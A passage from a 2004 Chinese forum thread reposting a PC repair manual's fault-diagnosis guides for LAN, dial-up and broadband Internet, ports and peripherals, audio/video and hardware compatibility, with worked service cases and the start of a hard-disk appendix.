              4) 主机外观检查：
              A. 检查机箱内是否有异物造成短路；
              B. 机箱内的灰尘是否过多，如果是，应清理灰尘；
              C. 主板与网卡上元器件是否有变形、变色现象；
              D. 加电后，注意部件、元器件及其它设备是否有异味、温度异常等现象发生。
              5) 其它方面：
              A. 在UNIX下，要分清是终端死机还是服务器死机
              3. 故障判断要点
              1) 寻求用户网管的配合。
              首先应尽可能与网管联系，以得到网管合作。
              2) 网络环境检查：
              A. 对于掉线、丢包等故障，要注意检查网卡与交换机间的兼容性；
              B. 网络连接正常，但不能进行域登录，要从以下几点检查：
              a) 指明的域名是否存在或已工作；
              b) 是否已按服务器、xx作系统的要求（如在服务器端启用了WINS解析服务、DNS服务等，WINXP
              HOME版不能登录到域中。），设置终端允许登录到域中，计算机名是否已注册到域中；
              c) 检查使用的协议是否正确；
              C. 检查是否安装了防火墙，是否被授权访问；
              D. 在必要时，使用直连线只连接两台机器在对等网环境下检查是否可连网（这样做可排除网络上诸环境因素的影响）。
              3) 网络适配器驱动与属性检查：
              A.
              驱动程序是否正确、合适。网卡设备建议由系统自动识别，并尽可能使用与xx作系统匹配和更新的驱动程序（只有老型号的ISA网卡才可使用手动安装的方法进行驱动的安装）。在安装驱动程序时，如有必要，可将启动中加载的和正在运行的程序关掉，再行安装；

              B.
              网卡在某一网络环境下工作不正常，可调整网速，如对于10/100Mbps的网卡，如果工作在10Mbps的网络环境下，网络工作不正常，应特别指定网卡工作在10Mbps的速度上；

              C. 检查网络通信方式，如是否为全双工等。
              4) 网络协议检查：
              A. 检查网络中的协议等项设置是否正确（不管用哪种协议，必须保证网内的机器使用的协议一致）。网络中是否有重名的计算机名；
              B.
              如果不能看到自己或其它计算机，先通过按F5多刷新几次来检查，然后检查是否安装并启用了文件和打印共享服务、是否添加了NETBEUI协议（如果网络环境中有WINS服务器，则不需添加，如没有则要添加）；

              C. 如能ping通网络，但不能在网上邻居中访问其它终端或服务器，可用ipconfig
              /all（在命令行方式）、netstat等命令查看具体信息，检查网络属性的设置，如域、工作组等，并进行相应的更改；
              D. TCP/IP协议的实用程序ping命令，可用来检查网络的工作情况。这需要维修人员了解TCP/IP协议的相关知识（顺序：PING
              127.0.0.1，本机IP、本网段IP、网关、DNS等）；
              E. 如果PING不通，可尝试在网络属性中把所有的适配器和协议删除，重启后重新安装；
              F. 通过执行tracert <目标IP地址>命令,检查IP包在哪个网段出错；
              5) 系统设置与应用检查：
              A. 检查机器自检完成后，所列的资源清单中网卡是否被列其中（非PNP网卡除外），其所用资源与其它设备有无共享；
              B.
              检查系统中是否有与网卡所用资源相冲突的其它设备，如有，可通过更换设备间的安装位置，或手动xx作更改冲突的资源。对于ISA总线的网卡，可能需要在CMOS中关掉其所占中断的PnP属性，且其所用资源一般不宜与其它设备共享。较老的PCI设备也不宜与其它设备共享资源；

              C. 检查系统中是否存在病毒；
              D.
              如果某一特定的应用在使用网络时工作不正常，检查CMOS设置是否正确，重点检查网卡的驱动程序是否与其匹配，必要时，关闭其它正在运行的应用程序，及启动中加载的程序，看是否能正常工作，或与能够正常运行该应用的机器进行比较，检查在配置方面有何不同；

              E. 通过重新安装系统，检查是否由于系统原因而导致网络工作不正常。
              6) 硬件检查：
              A. 用网卡自带程序和网卡短路环检测网卡是否完好；
              B. 如更换网卡后仍不正常，可更换主板，更换主板仍不能解决时，可考虑更换其它型号网卡；
              7) 对于无盘站，注意检查以下几点：
              A. BIOS中是否允许了从网络启动，BIOS中最好禁用软驱，将"Report No FDD For Win
              95"，由Yes更改为No（或反之。这与软驱的设置有关）
              B. 对于ISA网卡，其BIOS的设置，应使BOOT ROM默认的起始地址为D800H
              或C800H，I/O为300H（如有些网卡的默认设置为C800H容易与AGP显卡等部件占用的地址资源冲突导致安装失败）。；
              C. 在以上xx作无效时，对有些主板，屏蔽板载声卡，再根据需要进行相应的修改。
              D. 工作站的协议必须与服务器协议一致；
              E. 有多台服务器时，必须指定第一响应服务器。
              对于无线网络，特别要注意：
              A. 检查两台终端间的有效距离是否过大，中间是否有隔离物；
              B. 对等网络下，所使用的频率通道是否一致；
              C. 在用AP的环境下，终端的网络ESSID必须与AP一致；
              D. 检查网卡和AP的密钥的密钥是否相符。
              五、本类故障的判断流程
              见附录一之（七）。
              六、案例
              案例一：
              问题描述：网卡不工作，指示灯状态不正确；
              解决方案：首先观察系统设备管理器中有没有网卡这个设备，若没有则更换网卡或重新插拔网卡测试，并看金手指部分有没有锈迹，若有，则用橡皮擦干净测试。

              案例二：
              问题描述：局域网内，只有几台机器能连网，大部分不能互访。网卡灯亮，HUB灯闪
              解决方案：见到这种情况，要从软硬两个方面来分析，首先：
              a、软件方面，使用最新版本的KV3000进行了查、杀病毒工作，没有发现任何病毒，从而排除了病毒干扰的可能性。网络方面，安装了NetBEUI、IPX/SPX和TCP/IP协议，网卡的驱动也正确安装，在设备管理中没有发现任何冲突，并进行了协议绑定。设置了文件、打印机共享，也设定了工作组名称和计算机名称。应该说从网络协议到共享资源设置等均没有问题，可以排除软件方面的错误。

              b、从硬件方面分析，大致有四种可能：其一是网线断路，无法形成信号回路；其二是网线的线序是否正确；其三是在集线器与计算机间连接用的网线过长，超过100米；其四集线器端口有问题。针对这四种可能性，逐个进行排除。使用测线工具或万用表测量网线，发现网线连接状况很好，没有断路。通过目测，连接用的网线长度不可能超过100米。将几台网络已连通的计算机接在集线器上的插口换到怀疑损坏的集线器端口上，这几台计算机仍然互通，说明集线器端口没有损坏。

              c、通过对网线线序的检查，发现用户的制作的线序是1、2、3、4，问题就出在这儿，因为RJ45插头正确的连接应该是使用1、2、3、6，其中1、2是一对线，3、6是一对线，其余四根线没有定义。查出了问题，只需为用户重新做网线头，插入后网络正常。

              案例三：
              问题描述：脑在“网上邻居”中只能看到自己，而看不到其他电脑，从而无法使用其他电脑上的共享资源和共享打印机
              解决方案：使用ping命令，ping本地的IP地址或主机名，检查网卡和IP网络协议是否安装完好。如果能ping通，说明该电脑的网卡和网络协议设置都没有问题。问题出在电脑与网络的连接上。因此，应当检查网线和Hub及Hub的接口状态，如果无法ping通，只能说明TCP/IP协议有问题。重新设置网络协议，对于10台以下的机器且不上Internet的机器可考虑用NetBEUI协议，若上Intrnet则用TCP/IP协议，不管用哪种协议，必须保证网内的机器使用的协议一样。

              案例四：
              问题描述：无盘站不能上网或启动报错；
              解决方案：
              NOVELL无盘工作站不能正常登录服务器有以下几种情况：
                  a．工作站屏幕上出现“Error opening boot disk image file ”OR“Unable to open
              image file”
                  这可能是连到了一个没有包含远程启动映像文件的服务器。把启动映像文件拷到这个服务器的Login目录下；如果使用的是多远程启动映像文件，检查Bootconf.sys中对工作站是否进行了正确设置，应确保网络地址和节点地址的正确，如果以上都正确，那么可能是远程启动映像文件有问题，可以测试生成启动映像文件的软盘能否正常启动有盘工作站。若还不行，可以运行一下RPLFIX实用程序。

                  b．工作站屏幕上出现“Error finding server”
                  在确保硬件线路连接没问题的前提下，检查服务器上是否安装了“Ethernet_802.3”帧类型，远程启动映像文件的net.cfg
              中是否包含Ethernet_802.3，这种就是前面所说的旧型的IPX芯片，它不支持Ethernet－802.2帧。按照相应的帧类型重新制作启动映像文件。

                  c．工作站在从远程启动映像文件装入网卡驱动时挂起，屏幕并显示下面类似信息：Ethernet card is improperly
              install or net connected the network.
                  这就是由于前面所说的旧式IPX芯片在Netware
              4.X以上使用时，在远程启动映像文件中没有RPLODI.com或远程启动映像文件的批处理文件中ISL.com下行没有RPLODI.com行。

                  d．工作站显示“Loading MS－DOS”并挂起
                  这是由于远程启动映像文件使用了DOS 5．0或以上版本，对远程启动映像的文件运行RPLFIX实用程序。
                  e．屏幕上出现“batch file missing”
                  出现这个消息是由于autoexec.bat或其它批处理文件（对多个远程启动映像所使用的批处理）没有同时存在于LOGIN目录和用户登录目录。

              [此贴子已经被作者于2004-1-28 17:13:39编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:57:49新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第12楼

               常见故障判断－－－ Internet类故障
              一、定义举例
              主要是与浏览Internet有关的软、硬件故障。如：不能拨号、不能浏览网页等。
              二、可能的故障现象
              1、 不能拨号、无拨号音、拨号有杂音、上网掉线；
              2、 上网速度慢、个别网页不能浏览；
              3、 上网时死机、蓝屏报错等；
              4、 能收邮件但不能发邮件；
              5、 网络设备安装异常；
              6、 与调制解调器相连的其它通信设备损坏、或反之。
              三、可能涉及的部件
              调制解调器、电话机、电话线、局端。余类同 “局域网类故障”。
              四、判断要点/顺序
              1、 环境检查
              1) 周边及外观检查：
              A. 市电的接线定义是否正确，是否有地线；
              B. 外置MODEM附近是否有变压器等设备或其它可造成干扰的电器设备；
              C.
              电话是否有防盗打功能，是否安装了IP电话拨号器、传真机等外部设备。这些外部设备连接是否正确，工作是否正常（单独工作和连机情况下）；
              D. 检查机箱内灰尘是否较多，是否有异物造成短路，插接部件是否接插到位，无翘起；
              E. 主板、MODEM或宽带上网网卡上元器件是否有变形、变色等现象；
              F. 网卡接口接触是否良好；
              G. 加电后注意部件、元器件及其它设备是否有异味、温度异常等现象发生。
              2) 信号线连接：
              A. 电话线是否正确连接，连接的电话线是否正常，用户的电话是否为分机，是否有来电提醒；
              B. 拨打的电话号码是否有限制；
              C. 宽带上网其网线定义是否正确，能否连通，有条件的话将机器更换环境（如：到邻居家中或回站）后再进行测试，以验证是否为连线问题；
              2、 故障判断要点
              1) MODEM配置检查：
              A. 检查CMOS中的设置是否正确。MODEM设备是否被系统认到；
              B. 软件最小系统加MODEM，检查故障现象是否消失。如消失。则是硬件之间的不兼容或资源冲突造成的故障；
              C.
              在设备管理器中检查MODEM驱动是否正确，是否有资源冲突。MODEM支持的协议是否与局端不兼容。在驱动不正确时，可能会造成上网掉线、上网速度慢等现象。将原MODEM驱动删除（最好在控制面板——调制解调器中将MODEM删除），安装主板驱动后重新安装MODEM驱动程序；

              D. MODEM设备属性设置是否正确（如使用的连接速度等）。
              2) 拨号器/拨号过程检查：
              A.
              检查用户所用的拨号程序，是否为第三方的软件，建议用一新建的拨号连接，拨号上网（最好能不用用户的账号），检查是否能拨号，是否报错；
              B. 注意察看报错信息，初步判断故障原因（如：报680错误，是没有拨号音，678错误，是远程服务器没响应等）；
              C. 用户是否有权访问Internet网络。
              3) 网络属性及协议检查：
              A. 如果是通过服务提供商来拨号上网的，除一定要安装IP协议外，不应对IP地址等参数进行设定。其它上网方式，应按要求进行相关的设定；

              B. 使用的拨号协议是否与服务商要求的一致（如使用PPP协议等）。
              4) IE检查：
              A. 对于Windows 98系统，如果IE有故障，建议升级IE到5.5版本，或打补丁；
              B.
              检查IE属性设置是否正确，检查IE是否因上某一网站而被修改。如果临时文件过多，可造成上网后无法浏览网页（可在IE属性中删除临时文件等。关于删除的方法，见本章之后）。是否因为没有安装某些网站所必须的插件，而造成不能浏览网页。检查IE中的安全级别设置，和分级检查设置，恢复成默认值；

              C. 检查是否因上某些网站，造成系统被修改（如注册表被禁用等）；
              D. 检查用户的软件环境，是否由于防病毒、防火墙之类的软件，或其设置不正确，造成浏览困难。
              5) 系统检查：
              A. 检查系统中是否有病毒；
              B. 在MSCONFIG中关掉所有启动时加载的程序，关掉所有正在运行的程序。防止软件冲突造成的无法上网；
              C. 必要时重新安装xx作系统进行测试。
              6) 硬件检查：
              A. 更换MODEM所在的插槽，重新检测MODEM并安装驱动，如果无法上网，更换MODEM测试；
              B. 如果是在雷雨后出现不能拨号等现象，除检查电缆线及其上的其它设备是否损坏外，应查MODEM是否已损坏；
              C. 如还不能上网，注意检查其它硬件；
              7) 宽带上网如出现故障，还需检查：
              A. 检查网卡驱动是否安装正确；
              B. 用闭环测试网卡是否正常；
              C. 根据当地实际情况将拨号属性设置正确，根据宽带上网说明重新安装拨号软件，设置各项设置；
              D. 更换不同型号网卡进行测试，排除不兼容现象；
              E. 联系电信局或小区网管检查网络环境或连接设备；
              F. 对于自动上网的，代理服务器不要进行设置，对于早期的宽带网，需要设置IP。
              五、本类故障的判断流程
              见附录一之（八）。
              六、案例
              案例一：
              问题描述：
              一客户机器采用98xx作系统，在拨号上网时发现网页无法打开，但右下脚确实有链接的图标，发现无网络流量，但多拨几次后问题解决，此问题复现无规律，客户需要解释原因并证明不是机器的问题。

              解决方案：客户要求给予一个合理的解释，因为机器并非无法上网，了解到这一点就应该从软件方面来考虑，不能一上来就换硬件，给客户感觉不好。

              机器可以正常拨号说明机器的Modem硬件和驱动没有问题，但仔细观察后发现网络流量为0，说明机器并没有在网上，右下脚的链接符号可能是一种假相，使用ipconfig/all命令发现机器没有获得IP地址，为什么会有这种现象呢Ｉ诵纳能会和电信接入端有关，反复测试几次拨号上网，发现只要拨号后如果获得IP地址就一定可以上网，如果没有获得IP地址，就一定无法打开网页，客户看到这种现象后基本认可我的说法，并希望通过重新安装xx作系统来看是否可以解决，通过重新安装98xx作系统后问题依旧，客户已认为机器没有问题，在新的98下我为客户用另外一种方式进行测试，即用98里边的超级终端来拨号，原因是超级终端在拨号时可以看到拨号的全过程，是否可以得到IP地址，在使用超级终端拨号5－6次后发现有一次没有得到IP地址，至此客户完全信服了，正真的原因在于电信的局端，而不是在于机器本身。

              案例二：
              问题描述：客户机器所装的xx作系统为98，除安装Modem外，还加了一块网卡，客户机器平时使用网卡上局域网的，网卡获得IP是采用DHCP方式，但在拨号时无法拨号上网，可是有拨号音，客户要求彻底解决。

              解决方案： 客户以前曾经用过Modem拨号上网，现在无法使用，情绪较激动，除了解决外还需要充分的沟通，因此处理的过程很重要。
              我在测试时发现故障复现，经过和客户沟通，发现客户以前确实可以拨号上网，最近由于安装了一块网卡，局域网可以上，拨号是用不成了，从和客户的沟通后，我认为不是机器本身的问题，还是和设置及xx作系统本身有关，因为在2000下别的机器上是没有此问题的。首先我将网卡屏蔽掉，然后测试拨号上网，发现故障消失，难道和网卡有关，将网卡打开，发现可以拨号上网，问题解决！怎么回事，重新启动后发现局域网上去后拨号再次出现异常，故障复现，使用超级终端拨号发现无法获得IP地址，OK，问题找到，但是什么原因造成无法获得IP地址呢Ｉ诵拇来和xx作系统有关，因为2000下并无此问题，应该在98下和网卡有关，由于此局域网是采用DHCP方式，我用winipcfg将网卡IP
              Realse，再次拨号故障解决，总算找出了问题的所在，反复启动并释放网卡IP后拨号正常，后经和微软工程师沟通，确定95和98确实有这种问题，但2000下已经解决了此问题，至此问题圆满解决，客户表示非常认可。

              案例三：
              问题描述：客户自己买了一个Modem，用此Modem可以拨号163/169上网，但其却无法拨到公司的局域网上收发邮件，客户希望协助解决，虽然客户的Modem不是标配的。

              解决方案：客户自己对电脑还是比较熟悉的，因此只是要求我们协助处理，查出真正的原因，所以在处理这个问题时尽量不要打开机箱，做换主板之类的xx作，重点要来考虑兼容性。

              因为可以拨到163上，无法拨到公司网上，所以我重点要看客户Modem的型号及协议，客户的Modem是国产同维的产品，支持V.90协议，客户公司的Modem是美国3COM的产品，也支持V.90协议，首先用超级终端拨号到公司，发现出现拨号音后2秒后自动断调，没有到获得IP地址的那一步，这就说明这两个Modem出现了兼容性问题，在握手阶段出现了问题，向客户解释清楚后，客户向其单位借了一个3COM
              Modem，首先用拨号网络测试一切正常，再用超级终端测试发现一切正常，客户非常认可，认为我们的测试方式很有说服力。

              [此贴子已经被作者于2004-1-28 17:13:54编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:58:20新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第13楼

               常见故障判断－－－ 端口与外设故障
              一、定义举例
              这类故障主要涉及串并口、USB端口、键盘、鼠标等设备的故障。
              二、可能的故障现象
              1、 键盘工作不正常、功能键不起作用；
              2、 鼠标工作不正常；
              3、 不能打印或在某种xx作系统下不能打印；
              4、 外部设备工作不正常；
              5、 串口通信错误（如：传输数据报错、丢数据、串口设备识别不到等）；
              6、 使用USB设备不正常（如USB硬盘带不动，不能接多个USB设备等）；
              三、可能涉及的部件
              装有相应端口的部件（如主板）、电源、连接电缆、BIOS中的设置。
              四、判断要点/顺序
              1、 维修前的准备
              1) 准备相应端口的短路环测试制具；
              2) 准备测试程序QA、AMI等——这些程序要求在DOS下运行；
              3) 根据站内的资源，准备相应端口使用的电缆线，如并口、打印机线、串口线、USB线等。
              2、 环境检查
              1) 连接及外观检查：
              A. 设备数据电缆接口是否与主机连接良好、针脚是否有弯曲、缺失、短接等现象；
              B. 对于一些品牌的USB硬盘，应向用户说明最好使用外接电源以使其更好的工作；
              C. 连接端口及相关控制电路是否有变形、变色现象；
              D. 连接用的电缆是否与所要连接的设备匹配（如：两台机器通过串口相连，就应使用空调制解调器连接线而不能使用MODEM线等）。
              2) 外设检查：
              A. 外接设备的电源适配器是否与设备匹配；
              B. 检查外接设备是否可加电（包括自带电源，和从主机信号端口取电）；
              C. 检测其在纯DOS下是否可正常工作。如不能工作，应先检查线缆或更换外设及主板；
              D. 如果外接设备有自检等功能，可先行检验其是否为完好；也可将外接设备接至其它联想机器检测。
              3、 故障判断要点
              1) 尽可能简化系统，无关的外设先去掉；
              2) 端口设置检查（BIOS和xx作系统两方面）：
              A. 检查主板BIOS设置是否正确，端口是否打开，工作模式是否正确；
              B. 通过更新BIOS、更换不同品牌或不同芯片组主板，测试是否存在兼容问题；
              C.
              检查系统中相应端口是否有资源冲突。接在端口上的外设驱动是否已安装，其设备属性是否与外接设备相适应。在设置正确的情况下，检测相应的硬件——主板等；

              D. 检查端口是否可在DOS环境下使用，可通过接一外设或用下面介绍的端口检测工具检查；
              E.
              对于串、并口等端口，须使用相应端口的专用短路环，配以相应的检测程序（推荐使用AMI）进行检查。如果检测出有错误，则应更换相应的硬件；

              F.
              检查在一些应用软件中是否有不当的设置，导致一些外设在此应用下工作不正常。如：在一些应用下，设置了不当的热键组合，使某些键不能正常工作。

              3) 设备及驱动程序检查：
              A. 驱动重新安装时优先使用设备驱动自带的卸载程序,如Z32打印机；
              B. 检查设备软件设置是否与实际使用的端口相对应，如USB打印机要设置USB端口输出；
              C. USB设备、驱动、应用软件的安装顺序要严格按照使用说明xx作；
              D. 外设的驱动程序，最好使用较新的版本，并可到厂商的网站上去升级。
              [此贴子已经被作者于2004-1-28 17:14:06编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:59:13新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第14楼

               常见故障判断－－－ 音视频类故障
              一、定义举例
              与多媒体播放、制作有关的软硬件故障。
              二、可能的故障现象
              1、 播放CD、VCD或DVD等报错、死机；
              2、 播放多媒体软件时，有图像无声或无图像有声音；
              3、 播放声音时有杂音，声音异常、无声；
              4、 声音过小或过大，且不能调节；
              5、 不能录音、播放的录音杂音很大或声音较小；
              6、 设备安装异常。
              三、可能涉及的部件
              音、视频板卡或设备、主板、内存、光驱、磁盘介质、机箱等。
              四、判断要点/顺序
              1、 维修前的准备
              1)
              除必备的维修工具外，应准备最新的设备驱动、补丁程序、主板BIOS、最新的DirectX，标准格式的音频文件（CD、WAV文件）、视频文件（VCD、DVD）；

              2) 熟悉多媒体应用软件的各项设置，如WINDOWS下声音属性的设置、声卡/显卡附带应用软件的设置、视频盒/卡应用软件的设置等；
              3) 有针对性的了解用户的信息，主要了解：出现故障前是否安装过新硬件、软件、重装过系统（包括一键恢复）。
              2、 环境检查
              1) 检查市电的电压是否在允许的范围内（220V±10%）；
              2)
              检查设备电源、数据线连接是否正确，插头是否完全插好，如音箱、视频盒的音/视频连线等；开关是否开启；音箱的音量是否调整到适当大小；
              3) 观察用户的xx作方法是否正确；
              4)
              检查周围使用环境，有无大功率干扰设备，如：空调、背投、大屏幕彩电、冰箱等大功率电器。如果有应与其保持相当的距离（50厘米以上）；
              5) 检查主板BIOS设置是否被调整，应先将设置恢复出厂状态，特别检查CPU、内存是否被超频。
              3、 故障判断要点
              1)
              对声音类故障（无声、噪音、单声道等），首先确认音箱是否有故障，方法：可以将音箱连接到其他音源（如录音机、随身听）上检测，声音输出是否正常，此时可以判定音箱是否有故障；

              2) 检查是否由于未安装相应的插件或补丁，造成多媒体功能工作不正常；
              3)
              对多媒体播放、制作类故障，如果故障是在不同的播放器下、播放不同的多媒体文件均复现，则应检查相关的系统设置（如声音设置、光驱属性设置、声卡驱动及设置）。乃至检查相关的硬件是否有故障；

              4)
              如果是在特定的播放器下才有故障，在其他播放器下正常，应从有问题的播放器软件着手，检查软件设置是否正确，是否能支持被播放文件的格式。可以重新安装或升级软件后，看故障是否排除；

              5)
              如果故障是在重装系统、更换板卡、用系统恢复盘恢复系统、或使用一键恢复等情况下出现，应首先从板卡驱动安装入手检查，如驱动是否与相应设备匹配等；

              6)
              对于视频输入、输出相关的故障应首先检查视频应用软件采用信号制式设定是否正确，即应该与信号源（如有线电视信号）、信号终端（电视等）采用相同的制式。中国地区普遍为PAL制式；

              7)
              进行视频导入时，应注意视频导入软件和声卡的音频输入设置是否相符，如：软件中音频输入为MIC，则音频线接声卡的MIC口，且声卡的音频输入设置为MIC；

              当仅从光驱读取多媒体文件时出现故障，如：播放DVD/VCD速度慢、不连贯等，先检查光驱的传输模式，应设为“DMA”方式；
              9)
              检查有无第三方的软件，干扰系统的音视频功能的正常使用。另外，杀毒软件会引起播放DVD/VCD速度慢、不连贯等（如瑞星等，应关闭）；
              10) 软件检查
              A. 检查系统中是否有病毒；
              B. 声音/音频属性设置：音量的设定，是否使用数字音频等；
              C. 视频设置：视频属性中分辨率和色彩深度；
              D. 检查DirectX的版本，安装最新的DirectX。同时使用其提供的Dxdiag.exe程序，对声卡设备进行检查
              E.
              设备驱动检查：在WINDOWS下“系统—设备管理”中，检查多媒体相关的设备（显卡、声卡、视频卡等）是否正常，即不应存在有“？”或“！”等标识，设备驱动文件应完整。必要时，可通过卸载驱动再重新安装或进行驱动升级。对于说明书中注明必须手动安装的声卡设备，应按要求删除或直接覆盖安装（此时，不应让系统自动搜索，而是手动在设备列表中选取）；

              F.
              如用户曾重装过系统，可能在装驱动时没有按正确步骤xx作（如重启动等），导致系统显示设备正常，但实际驱动并没有正确工作。此时应为用户重装驱动。方法可同上；

              G.
              用系统恢复盘恢复系统、或使用一键恢复后有时会出现系统识别的设备不是用户实际使用的设备，而且在WINDOWS下“系统—设备管理”中不报错，这时必须仔细核对设备名称是否与实际的设备一致，不一致则重装驱动（如：更换过可替换的主板后声卡芯片与原来的不一致）；

              H. 重装驱动仍不能排除故障，应考虑是否有更新的驱动版本，应进行驱动升级、或安装补丁程序。
              11) 硬件检查
              A. 用内存检测程序检测内存部分是否有故障。考虑的硬件有主板和内存；
              B.
              首先采用替换法检查与故障直接关联的板卡、设备。声音类的问题：声卡、音箱、主板上的音频接口跳线；显示类问题：显卡；视频输入、输出类问题：视频盒/卡；

              C. 当仅从光驱读取多媒体文件时出现故障，在软件设置无效时，用替换法确定光驱是否有故障；
              D. 对于有噪音问题，检查光驱的音频连线是否正确安装，音箱自身是否有问题，音箱电源适配器是否有故障，及其他匹配问题等；
              E. 用磁盘类故障判断方法，检测硬盘是否有故障；
              F. 采用替换法确定CPU是否有故障；
              G. 采用替换法确定主板是否有故障。
              五、本类故障的判断流程
              见附录一之（十）。
              六、案例
              案例一：
              问题描述：用户报修同禧E5000电脑，安装的WINDOWS
              XP系统。用户在播放音视频文件，如VCD、CD、MP3等时，音箱里“滋滋”的噪音很明显。
              解决方案：
              一般看到此类问题，总是会先想到是音箱的问题，或者主板的声卡有问题。但是工程师先后更换音箱、主板都是故障依旧。此时维修陷入困境。
              其实只要仔细观察并思考一下，本着先软后硬的思路去观察，问题应该能很快解决的。此案例中，由于机器本身出厂是DOS系统，WINDOWS
              XP是用户自己安装的，声卡驱动也是WINDOWS
              XP自己认的，而恰恰是XP自带的驱动出了问题，造成用户报修的问题现象。只要安装随机驱动光盘里的相应的驱动程序，问题就迎刃而解了。
              案例二：
              问题描述：用户购买的未来先锋722机器，自己按装了 WINDOWS
              98，发现播放CD时无声音。在声音控制里已经打开了CD的控制，并且把音量调节到最大了。
              解决方案：首先我们要知道这点，联想出厂预装WINDOWS
              XP的机器，已经不再配置光驱和声卡之间的音频线了，播放CD时都采用XP本身提供的数字音频功能直接播放。而WINDOWS
              98不具备数字音频的功能。明白了这一点，用户的问题的答案也就明朗了。
              告诉用户机器标配中利用WINDOWS XP的数字音频功能播放CD，所以机器没有配置光驱音频线。而WINDOWS
              98不支持数字音频功能，所以会产生这样的问题。建议用户还是使用WINDOWS XPxx作系统，或者自己添加一根音频线。
              从这个案例不难看出，对产品配置、技术规范的了解和掌握对于我们解决用户问题是很重要的保证。
              [此贴子已经被作者于2004-1-28 17:14:18编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 16:59:39新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第15楼

               常见故障判断－－－ 兼容或配合性故障
              一、定义举例
              这类故障主要是由于用户追加第三方软、硬件设备而引起的软、硬件故障。
              这类故障，在前面的几类故障中已部分提及，因此有些故障现象可能与前面所介绍的故障判断类似，可参考。
              二、可能的故障现象
              1、 加装用户的设备或应用后，系统运行不稳定，如：死机或重启等；
              2、 用户所加装的设备不能正常工作；
              3、 用户开发的应用不能正常工作；
              4、 用户需要的配置在联想机上不能满足（如需要加装大容量内存、需要多个串口等）。
              三、可能涉及的部件
              所有可能的部件或软件。但影响第三方应用最多的部件应该是：主板、CPU、内存、显示卡，及新型接口的外设。
              四、判断要点/顺序
              1、 环境检查
              1) 检查外加设备板卡等的制作工艺，对于工艺粗糙的板卡或设备，很易引起黑屏、电源不工作、运行不稳定的现象；
              2)
              检查追加的内存条是否与原内存条是同一型号。不同的型号一是会引起兼容问题，造成运行不稳定、死机等现象；另一是要注意修改BIOS中的设置；

              3)
              更新或追加的部件，如CPU、硬盘等的技术规格是否能与其余的部件兼容。过于新的部件或规格较旧的部件，都会与原有配置不兼容。如：较旧的部件不支持电源管理，从而使系统运行时，使用这样的部件就会工作不正常，或是使整个系统也不能正常工作。

              2、 故障判断要点
              1) 开机后应首先检查新更新的或追加的部件，在系统启动前出现的配置列表中能否出现。如果不能，应检查其安装及其技术规格；
              2)
              如果造成无显、运行不稳定或死机等现象，应先去除更新或追加的部件或设备，看系统是否恢复到正常的工作状态，并认真研读新设备、部件的技术手册，了解安装与配置方法；

              3)
              外加的设备如不能正常安装，应查看其技术手册了解正确的安装方法、技术要求等，并尽可能使用最新版本的驱动程序。如果不能解决，应检查外加设备的质量及原系统的工作情况；

              4)
              检查新追加或更新部件与原有部件间是否存在不能共享资源的现象，即调开相应部件的资源检查故障是否消失，在不能调开时，可设法更换安装的插槽位置，或在BIOS中更改资源的分配方式；

              5) 检查是否由于BIOS的原因造成了兼容性问题，这可通过更新BIOS来检查（注不一定是最新版或更高版本，可以降低版本检查）；
              6) 查看追加的部件上的跳线设置是否恰当，并进行必要的设置修改；
              7) 对于使用较旧的板卡或软件，应注意是否由于速度上的不匹配而引起工作不正常；
              通过更改系统中的设置或服务，来检查故障是否消失。如电源管理服务、设备参数修改等；
              9) 检查原有的软硬件是否存在性能不佳的情况，即通过更换硬件或屏蔽原有软件来检查

              [此贴子已经被作者于2004-1-28 17:14:29编辑过]

        ----------------------------------------------
        欢迎访问BT之家
       2004-1-28 17:00:12新誉网络三线空间火热上市,买空间送域名 小游戏 数码频道

             东西抢

        头衔：考试求职版主
        等级：版主
        威望：20
        文章：5504
        积分：8524
        门派：网络世界
        注册：2003-10-4

                   第16楼

               附录
              每个用户的硬盘中都存放着大量的有用数据，而硬盘又是一个易出毛病的部件。为了有效的保存硬盘中的数据，除了有效的保存硬盘中的数据，备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者提取其中的有用数据，把损失降到最小程度。

              1、系统不承认硬盘
              此类故障比较常见，即从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE口端口上，硬盘本身的故障率很少，可通过重新插拔硬盘电缆或者改换IDE口及电缆等进行替换试验，可很快发现故障的所在。如果新接上的硬盘不承认，还有一个常见的原因就是硬盘上的主从条线，如果硬盘接在IDE的主盘位置，则硬盘必须跳为主盘状，跳线错误一般无法检测到硬盘。

              2、CMOS引起的故障
              CMOS的正确与否直接影响硬盘的正常使用，这里主要指其中的硬盘类型。好在现在的机器都支持"IDEautodetect"的功能，可自动检测硬盘的类型。当连接新的硬盘或者更换新的硬盘后都要通过此功能重新进行设置类型。当然，现在有的类型的主板可自动识别硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用Normal、LBA、Large等。如果在一般的模式下安装了数据，而又在CMOS中改为其他的模式，则会发生硬盘的读写错误故障，因为其物理地质的映射关系已经改变，将无法读取原来的正确硬盘位置。

              3、主引导程序引起的启动故障
